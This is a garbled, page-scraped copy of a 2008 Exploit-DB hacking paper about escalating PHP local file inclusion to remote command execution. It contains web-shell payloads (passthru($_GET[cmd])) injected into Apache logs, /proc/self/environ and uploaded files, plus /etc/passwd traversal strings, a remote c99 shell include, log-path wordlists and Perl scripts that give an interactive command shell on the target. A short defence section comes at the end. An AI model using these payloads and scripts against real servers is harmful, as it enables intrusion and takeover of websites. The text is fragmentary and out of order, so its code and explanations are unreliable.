Professional Documents
Culture Documents
Lfi To Rce
Lfi To Rce
1 de 21
https://www.exploit-db.com/papers/12992/
|=--------------------------------------------------------------------=|
|=-------------=[ LFI to RCE Exploit with Perl Script ]=--------------=|
|=------------------------=[ 7 December 2008 ]=-----------------------=|
|=----------------------=[
By CWH Underground
]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title
Author
Team
: 2008-12-07
##########
Contents
##########
[0x00] - Introduction
[0x01] - File Inclusion (RFI/LFI)
[0x01a] - How the attack works for Remote File Inclusion [RFI]
[0x01b] - How the attack works for Local File Inclusion [LFI]
[0x01c] - Vulnerable PHP Function for File Inclusion
[0x02] - Local File Inclusion To Remote Command Execution [LFI <> RCE]
[0x02a] - LFI <> RCE via Apache Log Injection
14/05/2016 11:28 a. m.
2 de 21
https://www.exploit-db.com/papers/12992/
#######################
[0x00] - Introduction
#######################
Welcome reader, this paper is a short attempt at documenting a practical technique
we have been working on. This papers will guide about technique that allows the attackers
(us) gaining access into the process of exploiting a website via File Inclusion (RFI/LFI)
and enlight the way to create own exploit script with perl
This paper is divided into 7 sections but only from section 0x01 to 0x05
Section 0x01, we talk about general concept of attacking via File Inclusion.
Section 0x02, we give a detail of how to execute arbitrary command via Local File Inclusion
in each approach. Section 0x03, we offer rudimentary commands to create HTTP transaction
with perl and some examples of how to use them. Section 0x04, we assemble knowleadge from
Section 0x01 to 0x03 in order to create own exploit to execute command on target system
via Local File Inclusion. The last, section 0x05, we suggest some methods to protect
your system from File Inclusion Attacking.
###################################
[0x01] - File Inclusion (RFI/LFI)
###################################
In a File Inclusion, Attackers run their own code on a vulnerable website.
The attack involves importing code into a program by taking advantage of the unenforced
14/05/2016 11:28 a. m.
3 de 21
https://www.exploit-db.com/papers/12992/
and unchecked assumptions the program makes about its inputs. If the attacker can include
their own malicious code on a web page, it is possible to "convince" a PHP script to include
a remote file instead of a presumably trusted file from the local file system.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - How the attack works for Remote File Inclusion [RFI]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Remote File Inclusion, known as RFI, is the technique to attack website by
injecting php script into target website. It's including "External" files (PHP Shell)
For instance, a piece of vulnerable PHP code would look like this:
[code]---------------------------------------------------------------------------------<?php
$file =$_GET['page'];
include($file .".php");
?>
[End code]--------------------------------------------------------------------------------From Code, It does not perform any checks on the content of the $page variable so it is easy
to putting our file (PHP Shell) into webpage like this
$file ="http://www.cwh.org/c99.php?";
include($file .".php");
?>
//$_GET['page'];
//include http://www.cwh.org/C99.php?.php
[End code]--------------------------------------------------------------------------------** We put "?" at the end of the URL, This makes the script fetch the intended file,
with the appended string as a parameter (which is ignored by the attackers script) **
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - How the attack works for Local File Inclusion [LFI]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LFI is a Local File Inclusion. It originates from including "internal" files
local file. But if you use it carelessly, it may lead to LFI vulnerabilty. This method
is often used in Linux to get "/etc/passwd" and sometimes "/etc/shadow".
14/05/2016 11:28 a. m.
4 de 21
https://www.exploit-db.com/papers/12992/
For instance, a piece of vulnerable PHP code would look like this:
[URL] http://www.hackme.com/index.php?template=cwh
[code #1]------------------------------------------------------------------------------<?php
$template =$_GET['template'];
include("/".$template .".php");
?>
<-- Vulnerable !!
[URL] http://www.hackme.com/index.php?template=../../../../etc/passwd%00
[code #1]------------------------------------------------------------------------------<?php
$template =$_GET['template'];
include("/../../../../etc/passwd%00.php");
?>
[End code]-----------------------------------------------------------------------------** Notice %00 (Null CHAR) will ignore everything that comes after %00 (.php suffix) **
** Notice ../../../ will traversal path to root and goto /etc/passwd **
topmenu();
include("manage/admin/main.php");
foot();
} else
topmenu();
include("manage/".$HTTP_COOKIE_VARS['cwh_user']."/main.php");
}
foot();
14/05/2016 11:28 a. m.
5 de 21
https://www.exploit-db.com/papers/12992/
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01c] - Vulnerable PHP Function for File Inclusion
++++++++++++++++++++++++++++++++++++++++++++++++++++++
File Inclusion (RFI/LFI) mostly occurs from some functions that developers
include_once()
require()
require_once()
fopen()
#######################################################################
[0x02] - Local File Inclusion To Remote Command Execution [LFI<>RCE]
#######################################################################
files.
In this section, we mention about the concept of using LFI in another way besides reading
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
or
into Apache log, Process Environment and Other files. This method is called "Remote Code Execution
(RCE)"
+++++++++++++++++++++++++++++++++++++
[0x02a] - LFI <> RCE via Apache Log
+++++++++++++++++++++++++++++++++++++
contain
The Malicious HTTP Request must existed to Apache logs, By their intrinsic nature logfiles
data that is driven by users look like this:
14/05/2016 11:28 a. m.
6 de 21
https://www.exploit-db.com/papers/12992/
Telnet]-------------------------------------------------------------->telnet www.hackme.com 80
[End log]------------------------------------------------------------------------------If we want to run arbitrary command on target system, we must inject PHP code via
HTTP request like <?passthru($_GET[cmd])?> After that logfiles will contain Malicious Code
[Malicious HTTP Request via Telnet]---------------------------------------------------->telnet www.hackme.com 80
Telnet
[End log]-------------------------------------------------------------------------------
stored
Now We can use LFI Vuln to run arbitrary command by finding out where the logs are
Go to LFI Vuln path:
[URL] www.hackme.com/index.php?p=../../apache/logs/access.log
(You can see ../../ that traversal to apache access log)
on line 457
14/05/2016 11:28 a. m.
7 de 21
https://www.exploit-db.com/papers/12992/
That's Great !! We have alredy injected code to logfiles, Now run arbitrary command
"www.hackme.com/cwh/<? passthru($_GET[cmd]) ?>", the logfile will show in URL encode format
[Logfiles - access.log]----------------------------------------------------------------......
"GET /cwh/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 200 1958 <-- Not work for Inject
......
[End log]------------------------------------------------------------------------------It won't work for RCE because browser will automatically encode special characters
(URL encode) after that it writes encoded request into logfiles (access.log).
So we must Inject malicious code via Telnet, Netcat or Perl script with
Error log is written when the requested file does not exist. Thus we can inject
[Sat Dec 06 15:12:56 2008] [error] [client 127.0.0.1] (20024)The given path
[End log]------------------------------------------------------------------------------Bingo !! We can injected code thru error.log, Next example show you about inject code
into "referer".
[Logfiles -
14/05/2016 11:28 a. m.
8 de 21
https://www.exploit-db.com/papers/12992/
error.log]-----------------------------------------------------------------......
[End log]-------------------------------------------------------------------------------
written
From log, Attacker can inject malicious code into "referer" then error.log will be
evil code. However injecting to access.log is easier than error.log
[Logfiles -
error.log]-----------------------------------------------------------------......
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
14/05/2016 11:28 a. m.
9 de 21
https://www.exploit-db.com/papers/12992/
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
++++++++++++++++++++++++++++++++++++++++++
[0x02b] - LFI <> RCE via Process Environ
++++++++++++++++++++++++++++++++++++++++++
When we request to PHP page, new process will be created. In *nix system, Each process
has its own /proc entry. /proc/self/ is a static path and symbolic link from lastest process
used that contain useful information. If we inject malicious code into /proc/self/environ, we
can run arbitrary command from target via LFI
agent
In Firefox Browser, we use "User Agent Switcher Add-ons" that can specify your user
manually Or use perl script to specify user agent with malicious code (See Next chapter).
For instance, a piece of /proc/self/environ would look like this:
[code]---------------------------------------------------------------------------------PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=root@hackme.com
...
[code]---------------------------------------------------------------------------------PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=root@hackme.com
...
<?passthru($_GET[cmd])?> HTTP_KEEP_ALIVE=300
...
14/05/2016 11:28 a. m.
10 de 21
https://www.exploit-db.com/papers/12992/
** Notice **
We don't recommend to use this method because It's immediately to inject code and run
++++++++++++++++++++++++++++++++++++++
[0x02c] - LFI <> RCE via Other Files
++++++++++++++++++++++++++++++++++++++
We saw Vulnerabilities in old version of FCKEditor (www.milw0rm.com/exploits/1484)
that allow many file extension to be uploaded, Some versions we can upload an extension not
specified in FCKEditor
have vulnerability
in Local File Inclusion, we can inject malicious code (<?passthru($_GET[cmd])?>) into uploaded
www.hackme.com/userfiles/upload/shell.cwh
www.hackme.com/index.php?p=./userfiles/upload/shell.cwh%00&cmd=ls -la
Many website in the world allow to upload image file (jpg/gif/bmp/...) almost websites
(.jpg/.gif/...) so it's vuln !!. If Attacker inject malicious code into image file (Maybe use
to jpeg file or change extension to image file manually) and upload to target server, Use LFI
technique traversal to
##########################################################
[0x03] - Fundamental of Perl Library for Exploit Website
##########################################################
In this section, we will talk about fundamental of neccessary perl commands used to send HTTP
packet to server.
They play a significant role in writing exploit. We recommend you to read this section before step to
next section.
But if you are familiar with Socket and LWP, you can skip this section. All commands mentioned in this
section will be
14/05/2016 11:28 a. m.
11 de 21
https://www.exploit-db.com/papers/12992/
++++++++++++++++++++++++++++++++++
between our pc
and a remote server in order to send manipulated request to a server. The informations that we
a socket are protocol, server address, server port and data. In perl, we use IO::Socket library
to create a socket.
[End code]-----------------------------------------------------------------------------For Example: If we want to create socket to port 80 on server ip 192.168.0.111 with tcp
protocol,
[End code]-----------------------------------------------------------------------------when we want to send http request through this socket, we can use this syntax.
[code]---------------------------------------------------------------------------------print $socket $data;
[End code]-----------------------------------------------------------------------------After finish using socket, we have to close the socket by this syntax.
[code]---------------------------------------------------------------------------------close ($socket);
[End code]------------------------------------------------------------------------------
14/05/2016 11:28 a. m.
12 de 21
https://www.exploit-db.com/papers/12992/
[End code]------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Introduction to Library for WWW in Perl (LWP)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
this library
LWP is a set of perl module designed to handle sending of http request. Usually we use
[End code]-----------------------------------------------------------------------------2: Send the http request to server by LWP::UserAgent and obtain http response by HTTP::Response
[code]---------------------------------------------------------------------------------$ua = LWP::UserAgent->new();
object.
object
[End code]------------------------------------------------------------------------------
14/05/2016 11:28 a. m.
13 de 21
https://www.exploit-db.com/papers/12992/
print $response->content;
print $response->header->as_string;
## response header
[End code]-----------------------------------------------------------------------------If we group all code together to show header and content of http transaction, we can do
following:
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$request = HTTP::Request->new (GET => "http://192.168.0.111/index.php");
$request->header (User_Agent => "Mozilla 2.0");
$ua = LWP::UserAgent->new();
print $response->content;
[End code]------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Condition to use Socket or LWP
++++++++++++++++++++++++++++++++++++++++++
As you can see above, Socket and LWP can send http request to server.
- We do not want http response. (Only inject http request packet to server)
- We do not want http request to be encoded. (If we send get method with LWP, the HTTP request
14/05/2016 11:28 a. m.
14 de 21
https://www.exploit-db.com/papers/12992/
######################################################
[0x04] - Writing LFI <> RCE Exploit with Perl Script
######################################################
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04a] - Perl Exploit to Injecting code into Target
++++++++++++++++++++++++++++++++++++++++++++++++++++++
have to work
We can inject our php code to server in many ways as I mention above. The rest that we
To create perl script to send malicious request, we will use socket to help this part.
that.
Before writing perl script, we have to know which file we will inject code into and how to do
manipulate
Logfiles are written when there is a request to a file on server. Thus we can
[End code]------------------------------------------------------------------------------
14/05/2016 11:28 a. m.
15 de 21
https://www.exploit-db.com/papers/12992/
[End code]------------------------------------------------------------------------------
[End code]------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x04b] - Perl Exploit to Executing injected code on Target
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
code.
to bring
As previous section, we can inject malicious code into some files on server by example
In this section, we will show how to create script to execute our code on server. So, we have
the concept from section 0x03b about LWP library.
(We choose to use LWP because we need http response to show result from execution of our code)
[+] Execute code from logfile
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$logfile = "../../../../var/log/httpd/access.log";
locations
## looping for execute command and exit program when command = exit ##
print "cwh-shell# ";
14/05/2016 11:28 a. m.
16 de 21
https://www.exploit-db.com/papers/12992/
while($cmd !~ "exit")
{
$content = "";
/lfi.php?file=".$logfile."%00&cmd=".$cmd);
$ua = LWP::UserAgent->new();
[End code]------------------------------------------------------------------------------
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$uploadedfile = "../../../path/to/uploaded/file/shell.cwh";
## looping for execute command and exit program when command = exit ###
print "cwh-shell# ";
$content = "";
/lfi.php?file=".$uploadedfile."%00&cmd=".$cmd);
$ua = LWP::UserAgent->new();
14/05/2016 11:28 a. m.
17 de 21
https://www.exploit-db.com/papers/12992/
[code]---------------------------------------------------------------------------------use LWP;
use HTTP::Request;
$procenviron = "../../../../../../proc/self/environ";
## looping for execute command and exit program when command = exit ##
print "cwh-shell# ";
$content = "";
/lfi.php?file=".$procenviron."%00&cmd=".$cmd);
$ua = LWP::UserAgent->new();
[End code]------------------------------------------------------------------------------
Finally, as you can see from three codes above, the code to loop for execute command is
the same.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
path of logfile.
contain
In order to execute code from logfile, we have a problem that we do not know the exact
So we have to find path by looping through the fesible paths that we have and see which file
the word "cwhunderground" as we inject in previous example code.
Simple Code for LFI <> RCE Exploit:
[code]---------------------------------------------------------------------------------use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;
$log="../";
14/05/2016 11:28 a. m.
18 de 21
https://www.exploit-db.com/papers/12992/
@apache=(
"../../../../../var/log/httpd/access_log",
"../apache/logs/access.log",
"../../apache/logs/access.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/access.log",
"../logs/access.log",
"../../logs/access.log",
"../../../logs/access.log",
"../../../../logs/access.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"
);
print "
print "==========================================\n";
if (@ARGV < 2)
{
$host=$ARGV[0];
$path=$ARGV[1];
if ( $host
=~
passthru(\$_GET[cmd]);?>";
14/05/2016 11:28 a. m.
19 de 21
https://www.exploit-db.com/papers/12992/
!~
foreach $getlog(@apache)
{
chomp($getlog);
$find= $host.$path.$getlog."%00";
if($info =~ /cwhunderground/)
$shell= $host.$path.$log."%00&cmd=$cmd";
if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg)
{print $1;}
[End code]------------------------------------------------------------------------------
########################################
[0x05] - How to protect File Inclusion
########################################
- Consider implementing a chroot jail
14/05/2016 11:28 a. m.
20 de 21
https://www.exploit-db.com/papers/12992/
[code]---------------------------------------------------------------------------------<?php
$file =$_GET['page'];
include($file);
?>
[End code]------------------------------------------------------------------------------
// #1 Patching Code !!
[code]---------------------------------------------------------------------------------<?php
include "./new.php";
?>
[End code]------------------------------------------------------------------------------
// #2 Patching Code !!
[code]---------------------------------------------------------------------------------<?php
$file =$_GET['page'];
?>
[End code]------------------------------------------------------------------------------
#####################
[0x06] - References
#####################
[1] http://en.wikipedia.org/wiki/Remote_File_Inclusion
[2] http://cwe.mitre.org/data/definitions/98.html
14/05/2016 11:28 a. m.
21 de 21
https://www.exploit-db.com/papers/12992/
[5] www.owasp.org/index.php/PHP_Top_5
[6] www.milw0rm.com
####################
[0x07] - Greetz To
####################
Greetz
----------------------------------------------------
damage
This paper is written for Educational purpose only. The authors are not responsible for any
originating from using this paper in wrong objective. If you want to use this knowleadge with other
person systems,
# milw0rm.com [2008-12-08]
14/05/2016 11:28 a. m.